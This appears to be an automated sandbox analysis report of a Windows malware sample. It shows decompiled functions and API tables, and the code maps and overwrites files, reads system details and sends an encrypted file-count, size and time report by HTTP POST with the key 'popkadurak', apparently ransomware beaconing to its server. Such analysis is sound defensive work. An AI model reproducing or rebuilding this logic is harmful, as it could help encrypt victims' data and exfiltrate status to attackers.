                                    								_t29 = _t4;
                                    								_t5 = _t23 + 6; // 0x6, executed
                                    								E0F148400(_t29, _t5); // executed
                                    								_t40 = _t40 + 4;
                                    							}
                                    							_push(_t29);
                                    							_t24 = E0F142830(_v12, _t38, _v8); // executed
                                    							_t28 = _t24;
                                    							UnmapViewOfFile(_t38);
                                    						}
                                    						CloseHandle(_v16);
                                    						CloseHandle(_t34);
                                    						return _t28;
                                    					} else {
                                    						CloseHandle(_t34);
                                    						goto L3;
                                    					}
                                    				}
                                    			}





















                                    0x0f142890
                                    0x0f142899
                                    0x0f14289b
                                    0x0f1428ab
                                    0x0f1428b1
                                    0x0f1428b6
                                    0x0f1428f9
                                    0x0f142901
                                    0x0f1428b8
                                    0x0f1428c0
                                    0x0f1428c3
                                    0x0f1428ca
                                    0x0f1428cf
                                    0x0f1428d0
                                    0x0f1428d8
                                    0x0f1428e5
                                    0x0f1428eb
                                    0x0f1428f0
                                    0x0f14290a
                                    0x0f142910
                                    0x0f142914
                                    0x0f142916
                                    0x0f14291d
                                    0x0f14291f
                                    0x0f142920
                                    0x0f142920
                                    0x0f142923
                                    0x0f142926
                                    0x0f14292b
                                    0x0f14292b
                                    0x0f14292e
                                    0x0f142937
                                    0x0f14293f
                                    0x0f142942
                                    0x0f142942
                                    0x0f142951
                                    0x0f142954
                                    0x0f14295e
                                    0x0f1428f2
                                    0x0f1428f3
                                    0x00000000
                                    0x0f1428f3
                                    0x0f1428f0

                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F142C02), ref: 0F1428AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,0F142C02), ref: 0F1428BA
                                    • CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F142C02), ref: 0F1428E5
                                    • CloseHandle.KERNEL32(00000000,?,?,0F142C02), ref: 0F1428F3
                                    • MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F142C02), ref: 0F14290A
                                    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F142C02), ref: 0F142942
                                    • CloseHandle.KERNEL32(?,?,?,0F142C02), ref: 0F142951
                                    • CloseHandle.KERNEL32(00000000,?,?,0F142C02), ref: 0F142954
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                    • String ID:
                                    • API String ID: 265113797-0
                                    • Opcode ID: 306637e7265ea33964a972aee3a226e972427bb8a6fac59652ec95ddaa7384e1
                                    • Instruction ID: 49e6b2f91d9f010a47120a36375ab8f8a1186f2c37cae55239dc6a1cb3628b8c
                                    • Opcode Fuzzy Hash: 306637e7265ea33964a972aee3a226e972427bb8a6fac59652ec95ddaa7384e1
                                    • Instruction Fuzzy Hash: B521F2B5A412197BE3106B749C85F7F776CDF85A66F010224FC01E2281EB38BC254AA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F147410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                    				void* _v8;
                                    				long _t14;
                                    				long _t18;
                                    
                                    				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                    				if(_t14 != 0) {
                                    					return 0;
                                    				} else {
                                    					_a8 = _a20;
                                    					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                    					if(_t18 != 0) {
                                    						GetLastError();
                                    						RegCloseKey(_v8);
                                    						return 0;
                                    					} else {
                                    						_t11 = _t18 + 1; // 0x1, executed
                                    						RegCloseKey(_v8); // executed
                                    						return _t11;
                                    					}
                                    				}
                                    			}






                                    0x0f147426
                                    0x0f147430
                                    0x0f147484
                                    0x0f147432
                                    0x0f147435
                                    0x0f147447
                                    0x0f14744f
                                    0x0f147466
                                    0x0f14746f
                                    0x0f14747b
                                    0x0f147451
                                    0x0f147454
                                    0x0f147457
                                    0x0f147463
                                    0x0f147463
                                    0x0f14744f

                                    APIs
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147426
                                    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147447
                                    • RegCloseKey.KERNEL32(?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147457
                                    • GetLastError.KERNEL32(?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147466
                                    • RegCloseKey.ADVAPI32(?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F14746F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$ErrorLastOpenQueryValue
                                    • String ID:
                                    • API String ID: 2437438455-0
                                    • Opcode ID: 904de225a2f1fd1a144c35b1217af5497cf20a54f81261ddfe64133e11efba13
                                    • Instruction ID: a31428decdffae4466a8547bceb312c3212b30ecfdd79a0160cd91adae5e2fb5
                                    • Opcode Fuzzy Hash: 904de225a2f1fd1a144c35b1217af5497cf20a54f81261ddfe64133e11efba13
                                    • Instruction Fuzzy Hash: 1F012C7664111DFBCB109F94ED09DEABB68EF48362B018162FD09D6111D736AA34ABE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0F142830(WCHAR* __ecx, void* __edx, long _a4) {
                                    				long _v8;
                                    				void* _t3;
                                    				int _t7;
                                    				void* _t9;
                                    				void* _t14;
                                    				struct _OVERLAPPED* _t17;
                                    
                                    				_push(__ecx);
                                    				_t9 = __edx; // executed
                                    				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                    				_t14 = _t3;
                                    				_t17 = 0;
                                    				if(_t14 != 0xffffffff) {
                                    					if(_t9 == 0) {
                                    						L3:
                                    						_t17 = 1;
                                    					} else {
                                    						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
                                    						if(_t7 != 0) {
                                    							goto L3;
                                    						}
                                    					}
                                    					FindCloseChangeNotification(_t14); // executed
                                    				}
                                    				return _t17;
                                    			}









                                    0x0f142833
                                    0x0f14284a
                                    0x0f14284c
                                    0x0f142852
                                    0x0f142854
                                    0x0f142859
                                    0x0f14285d
                                    0x0f142873
                                    0x0f142873
                                    0x0f14285f
                                    0x0f142869
                                    0x0f142871
                                    0x00000000
                                    0x00000000
                                    0x0f142871
                                    0x0f142879
                                    0x0f142879
                                    0x0f142887

                                    APIs
                                    • CreateFileW.KERNEL32(0F142C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0F142C02,?,0F14293C,?), ref: 0F14284C
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0F14293C,?,?,?,?,0F142C02), ref: 0F142869
                                    • FindCloseChangeNotification.KERNEL32(00000000,?,0F14293C,?,?,?,?,0F142C02), ref: 0F142879
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ChangeCloseCreateFindNotificationWrite
                                    • String ID:
                                    • API String ID: 3805958096-0
                                    • Opcode ID: 7110b213c83c9e92473ac15d97371af8bd1e6c41c04b533e3071ab2d90f671b2
                                    • Instruction ID: 9d734b5a5b8012306676e6f8f318fd15335b5dd2a62498276f41d952902e818e
                                    • Opcode Fuzzy Hash: 7110b213c83c9e92473ac15d97371af8bd1e6c41c04b533e3071ab2d90f671b2
                                    • Instruction Fuzzy Hash: 4BF0E27634020437E2200A96AC89FABB69CCBC6B61F510225BA08A20C1D6B4BC6146A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0F146550(void** __ecx) {
                                    				void** _v8;
                                    				void* _t19;
                                    				void* _t20;
                                    				void* _t24;
                                    
                                    				_push(__ecx);
                                    				_v8 = __ecx;
                                    				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
                                    				_v8[1] = _t19;
                                    				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
                                    				 *_v8 = _t20;
                                    				_v8[3] = 0x123;
                                    				_v8[2] = 0x515;
                                    				_t13 =  &(_v8[1]); // 0xc7000000
                                    				_t24 = E0F1463E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
                                    				if(_t24 == 0) {
                                    					_v8[4] = 1;
                                    				}
                                    				_v8[4] = 0;
                                    				return _v8;
                                    			}







                                    0x0f146553
                                    0x0f146554
                                    0x0f146565
                                    0x0f14656e
                                    0x0f14657f
                                    0x0f146588
                                    0x0f14658d
                                    0x0f146597
                                    0x0f1465b5
                                    0x0f1465b9
                                    0x0f1465c3
                                    0x0f1465c8
                                    0x0f1465c8
                                    0x0f1465d2
                                    0x0f1465df

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F144B9E), ref: 0F146565
                                    • VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F144B9E), ref: 0F14657F
                                      • Part of subcall function 0F1463E0: CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F144B96,?,0F144B9E), ref: 0F1463F8
                                      • Part of subcall function 0F1463E0: GetLastError.KERNEL32(?,0F144B9E), ref: 0F146402
                                      • Part of subcall function 0F1463E0: CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F144B9E), ref: 0F14641E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 3824161113-0
                                    • Opcode ID: d1ebf50f168aaa0d6c14b178ee344ca3fb268851520407919d3643ed5b8f7830
                                    • Instruction ID: bf56d1e2374c7b93603e801f485ff5467e2ea222a459d34423d8c71a5c0fd8ec
                                    • Opcode Fuzzy Hash: d1ebf50f168aaa0d6c14b178ee344ca3fb268851520407919d3643ed5b8f7830
                                    • Instruction Fuzzy Hash: B111C974A40208EFD704CF84DA55F99B7F5EF88719F208188E908AB381D7B5AF109F54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E0F1453D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
                                    				int _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				void* _v20;
                                    				void** _v24;
                                    				void* _v28;
                                    				void* _v32;
                                    				char _v36;
                                    				void* _v84;
                                    				CHAR* _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				char _v104;
                                    				short _v128;
                                    				void* __esi;
                                    				int _t40;
                                    				BYTE* _t41;
                                    				int _t43;
                                    				void* _t61;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t69;
                                    				intOrPtr _t71;
                                    				CHAR* _t80;
                                    				char* _t82;
                                    				CHAR* _t83;
                                    				void* _t84;
                                    				CHAR* _t88;
                                    				int _t96;
                                    				void* _t98;
                                    				void* _t99;
                                    				int _t100;
                                    				void* _t101;
                                    				long _t102;
                                    				BYTE* _t103;
                                    				CHAR* _t105;
                                    				void* _t106;
                                    				void* _t108;
                                    
                                    				_t82 = __ecx;
                                    				_v16 = __edx;
                                    				_t40 = lstrlenA(__ecx) + 1;
                                    				_v8 = _t40;
                                    				_t3 = _t40 + 1; // 0x2
                                    				_t102 = _t3;
                                    				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
                                    				_v20 = _t41;
                                    				if(_t41 == 0 || _v8 >= _t102) {
                                    					_t103 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t103 = _t41;
                                    				}
                                    				_t98 = 0;
                                    				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
                                    				_t116 = _t43;
                                    				if(_t43 == 0) {
                                    					GetLastError();
                                    					goto L14;
                                    				} else {
                                    					_t96 = _v8;
                                    					E0F145F00(_t103, _t96, _t103);
                                    					asm("xorps xmm0, xmm0");
                                    					_t88 =  &_v36;
                                    					asm("movdqu [ebp-0x20], xmm0");
                                    					E0F1433E0(_t88, _t116, _t103);
                                    					if(_v36 != 0) {
                                    						E0F145350();
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						_push(_t82);
                                    						_push(_t103);
                                    						_t83 = _t88;
                                    						_v96 = _t96;
                                    						_push(0);
                                    						_v88 = _t83;
                                    						E0F147E40( &_v104);
                                    						_v92 = E0F145220();
                                    						_t99 = 0x400 + lstrlenA(_t83) * 2;
                                    						_t22 = _t99 + 1; // 0x1
                                    						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
                                    						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    						__eflags = _t84;
                                    						if(_t84 == 0) {
                                    							L20:
                                    							_t105 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t24 = _t99 + 1; // 0x1
                                    							__eflags = _t99 - _t24;
                                    							if(_t99 >= _t24) {
                                    								goto L20;
                                    							} else {
                                    								_t105 = _t84;
                                    							}
                                    						}
                                    						lstrcatA(_t105, _v16);
                                    						asm("movdqu xmm0, [0xf14fb40]");
                                    						asm("movdqu [ebp-0x78], xmm0");
                                    						asm("movdqu xmm0, [0xf14fb50]");
                                    						asm("movdqu [ebp-0x68], xmm0");
                                    						asm("movdqu xmm0, [0xf14fb60]");
                                    						asm("movdqu [ebp-0x58], xmm0");
                                    						asm("movdqu xmm0, [0xf14fb70]");
                                    						asm("movdqu [ebp-0x48], xmm0");
                                    						asm("movdqu xmm0, [0xf14fb80]");
                                    						asm("movdqu [ebp-0x38], xmm0");
                                    						asm("movdqu xmm0, [0xf14fb90]");
                                    						asm("movdqu [ebp-0x28], xmm0");
                                    						lstrlenA(_t105);
                                    						_t100 = 0;
                                    						_push(lstrlenW( &_v128));
                                    						_push( &_v128);
                                    						_push(L"POST");
                                    						_push(0x31fff);
                                    						_push(_v12);
                                    						_push(lstrlenA(_t105));
                                    						_push(_t105);
                                    						_t106 = _v20;
                                    						_push(L"popkadurak");
                                    						_push(_t106);
                                    						_t61 = E0F148050( &_v32);
                                    						__eflags = _t61;
                                    						if(_t61 != 0) {
                                    							__eflags = _a4;
                                    							_t100 = 1;
                                    							if(_a4 != 0) {
                                    								_v16 = 0;
                                    								_t68 = E0F1453D0(_v12,  &_v16);
                                    								__eflags = _t68;
                                    								if(_t68 == 0) {
                                    									_t100 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t69 = _v16;
                                    									__eflags = _t69;
                                    									if(_t69 != 0) {
                                    										 *_v24 = _t69;
                                    									}
                                    								}
                                    							}
                                    						}
                                    						VirtualFree(_t106, 0, 0x8000);
                                    						VirtualFree(_v12, 0, 0x8000);
                                    						VirtualFree(_t84, 0, 0x8000);
                                    						_t65 = _v28;
                                    						__eflags = _t65;
                                    						if(_t65 != 0) {
                                    							InternetCloseHandle(_t65);
                                    						}
                                    						return _t100;
                                    					} else {
                                    						_t101 = _v32;
                                    						_t71 =  *0xf152a60; // 0x0
                                    						_t108 = _v28;
                                    						_t72 =  !=  ? 0 : _t71;
                                    						_v12 = 1;
                                    						 *0xf152a60 =  !=  ? 0 : _t71;
                                    						if(_t108 != 0) {
                                    							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
                                    							 *_v16 = _t80;
                                    							if(_t80 != 0) {
                                    								lstrcpyA(_t80, _t108);
                                    							}
                                    						}
                                    						_t73 = GetProcessHeap;
                                    						if(_t101 != 0) {
                                    							HeapFree(GetProcessHeap(), 0, _t101);
                                    							_t73 = GetProcessHeap;
                                    						}
                                    						if(_t108 != 0) {
                                    							HeapFree( *_t73(), 0, _t108);
                                    						}
                                    						_t98 = _v12;
                                    						L14:
                                    						VirtualFree(_v20, 0, 0x8000);
                                    						return _t98;
                                    					}
                                    				}
                                    			}









































                                    0x0f1453d9
                                    0x0f1453db
                                    0x0f1453e5
                                    0x0f1453ed
                                    0x0f1453f0
                                    0x0f1453f0
                                    0x0f1453f6
                                    0x0f1453fc
                                    0x0f145401
                                    0x0f14540c
                                    0x0f14540c
                                    0x0f145408
                                    0x0f145408
                                    0x0f145408
                                    0x0f14540e
                                    0x0f14541b
                                    0x0f145421
                                    0x0f145423
                                    0x0f1454dc
                                    0x00000000
                                    0x0f145429
                                    0x0f145429
                                    0x0f14542e
                                    0x0f145433
                                    0x0f145436
                                    0x0f14543a
                                    0x0f14543f
                                    0x0f145447
                                    0x0f1454e4
                                    0x0f1454e9
                                    0x0f1454ea
                                    0x0f1454eb
                                    0x0f1454ec
                                    0x0f1454ed
                                    0x0f1454ee
                                    0x0f1454ef
                                    0x0f1454f6
                                    0x0f1454f7
                                    0x0f1454f8
                                    0x0f1454fa
                                    0x0f1454fd
                                    0x0f145501
                                    0x0f145504
                                    0x0f14550f
                                    0x0f145525
                                    0x0f14552c
                                    0x0f145542
                                    0x0f145546
                                    0x0f145549
                                    0x0f14554b
                                    0x0f145558
                                    0x0f145558
                                    0x0f145558
                                    0x0f14554d
                                    0x0f14554d
                                    0x0f145550
                                    0x0f145552
                                    0x00000000
                                    0x0f145554
                                    0x0f145554
                                    0x0f145554
                                    0x0f145552
                                    0x0f14555e
                                    0x0f145564
                                    0x0f14556d
                                    0x0f145572
                                    0x0f14557a
                                    0x0f14557f
                                    0x0f145587
                                    0x0f14558c
                                    0x0f145594
                                    0x0f145599
                                    0x0f1455a1
                                    0x0f1455a6
                                    0x0f1455ae
                                    0x0f1455b3
                                    0x0f1455bc
                                    0x0f1455c5
                                    0x0f1455c9
                                    0x0f1455ca
                                    0x0f1455d2
                                    0x0f1455d7
                                    0x0f1455e1
                                    0x0f1455e2
                                    0x0f1455e3
                                    0x0f1455e9
                                    0x0f1455ee
                                    0x0f1455ef
                                    0x0f1455f4
                                    0x0f1455f6
                                    0x0f1455f8
                                    0x0f1455fc
                                    0x0f145601
                                    0x0f145609
                                    0x0f145610
                                    0x0f145615
                                    0x0f145617
                                    0x0f145627
                                    0x0f145627
                                    0x0f145619
                                    0x0f145619
                                    0x0f14561c
                                    0x0f14561e
                                    0x0f145623
                                    0x0f145623
                                    0x0f14561e
                                    0x0f145617
                                    0x0f145601
                                    0x0f145637
                                    0x0f145643
                                    0x0f14564d
                                    0x0f14564f
                                    0x0f145652
                                    0x0f145654
                                    0x0f145657
                                    0x0f145657
                                    0x0f145665
                                    0x0f14544d
                                    0x0f14544d
                                    0x0f145452
                                    0x0f145459
                                    0x0f14545c
                                    0x0f14545f
                                    0x0f145466
                                    0x0f14546d
                                    0x0f145481
                                    0x0f14548a
                                    0x0f14548e
                                    0x0f145492
                                    0x0f145492
                                    0x0f14548e
                                    0x0f14549e
                                    0x0f1454a5
                                    0x0f1454ad
                                    0x0f1454af
                                    0x0f1454af
                                    0x0f1454b6
                                    0x0f1454be
                                    0x0f1454be
                                    0x0f1454c0
                                    0x0f1454c3
                                    0x0f1454cd
                                    0x0f1454db
                                    0x0f1454db
                                    0x0f145447

                                    APIs
                                    • lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1453DF
                                    • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1453F6
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F14541B
                                    • lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145477
                                    • VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145481
                                    • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145492
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1454AD
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1454BE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1454CD
                                    • GetLastError.KERNEL32(?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1454DC
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F145512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F145532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F145544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F14555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F1455B3
                                    • lstrlenW.KERNEL32(?), ref: 0F1455BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F1455DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F145643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F14564D
                                    • InternetCloseHandle.WININET(0F14581B), ref: 0F145657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
                                    • String ID: POST$popkadurak
                                    • API String ID: 1287001821-2707760125
                                    • Opcode ID: 4995e832fd23e7df4cce26c63528659734334da3955162534756027a01868290
                                    • Instruction ID: 0acf0bfd5f88af70ea37a5ea26910a81c56c2851eb5e45c9926d788692104269
                                    • Opcode Fuzzy Hash: 4995e832fd23e7df4cce26c63528659734334da3955162534756027a01868290
                                    • Instruction Fuzzy Hash: 6E71D375E40309ABEB109FA59C45FAEBB79EFC8B12F140115FA04A7241DB78B5A4CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E0F145670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				void* _v20;
                                    				char _v164;
                                    				void* __esi;
                                    				BYTE* _t33;
                                    				int _t41;
                                    				CHAR* _t44;
                                    				int _t52;
                                    				void* _t53;
                                    				char _t60;
                                    				BYTE* _t65;
                                    				char* _t69;
                                    				signed int _t70;
                                    				void* _t75;
                                    				signed int _t78;
                                    				CHAR* _t85;
                                    				int _t87;
                                    				long _t88;
                                    				void* _t89;
                                    				void* _t91;
                                    				void* _t94;
                                    
                                    				_t82 = __edx;
                                    				_t70 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __ecx;
                                    				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                    				_v20 = _t33;
                                    				if(_t33 == 0) {
                                    					_t65 = 0;
                                    					_t85 = 0;
                                    				} else {
                                    					_t4 =  &(_t33[0x800]); // 0x800
                                    					_t85 = _t4;
                                    					_t65 = _t33;
                                    				}
                                    				_push(_v12);
                                    				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_t94 = _t91 + 0x14;
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				E0F143BC0( &_v164);
                                    				E0F147490( &_v164, _t82);
                                    				E0F1472A0( &_v164);
                                    				E0F1470A0( &_v164, _t65 + lstrlenW(_t65) * 2);
                                    				_t41 = lstrlenW(_t65);
                                    				_t75 =  *0xf152a78; // 0x0
                                    				_v8 = _t41;
                                    				if(_t75 != 0) {
                                    					VirtualFree(_t75, 0, 0x8000);
                                    				}
                                    				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    				 *0xf152a78 = _t44;
                                    				if(_t44 != 0) {
                                    					wsprintfA(_t44, "%S", L"popkadurak");
                                    					_t94 = _t94 + 0xc;
                                    				}
                                    				_t87 = _v8 + _v8;
                                    				E0F145F00(_t65, _t87, _t87);
                                    				_v16 = _v8 * 8;
                                    				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
                                    					GetLastError();
                                    				}
                                    				_t22 = lstrlenA(_t85) + 4; // 0x4
                                    				_t88 = _t22;
                                    				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
                                    				_t52 = lstrlenA(_t85);
                                    				_t78 = _v12;
                                    				_t53 = _t52 + 2;
                                    				if(_t78 == 0) {
                                    					L11:
                                    					_v8 = 0;
                                    				} else {
                                    					_v8 = _t78;
                                    					if(_t53 >= _t88) {
                                    						goto L11;
                                    					}
                                    				}
                                    				_t89 = 0;
                                    				if(lstrlenA(_t85) != 0) {
                                    					_t69 = _v8;
                                    					do {
                                    						_t60 =  *((intOrPtr*)(_t89 + _t85));
                                    						if(_t60 != 0xa && _t60 != 0xd) {
                                    							 *_t69 = _t60;
                                    							_t69 = _t69 + 1;
                                    						}
                                    						_t89 = _t89 + 1;
                                    					} while (_t89 < lstrlenA(_t85));
                                    				}
                                    				E0F1454F0(_v8, 0, _t78, 0);
                                    				_t68 =  !=  ? 1 : 0;
                                    				VirtualFree(_v12, 0, 0x8000);
                                    				E0F147D70( &_v164);
                                    				VirtualFree(_v20, 0, 0x8000);
                                    				_t59 =  !=  ? 1 : 0;
                                    				return  !=  ? 1 : 0;
                                    			}


























                                    0x0f145670
                                    0x0f145670
                                    0x0f145690
                                    0x0f145693
                                    0x0f145696
                                    0x0f145698
                                    0x0f14569d
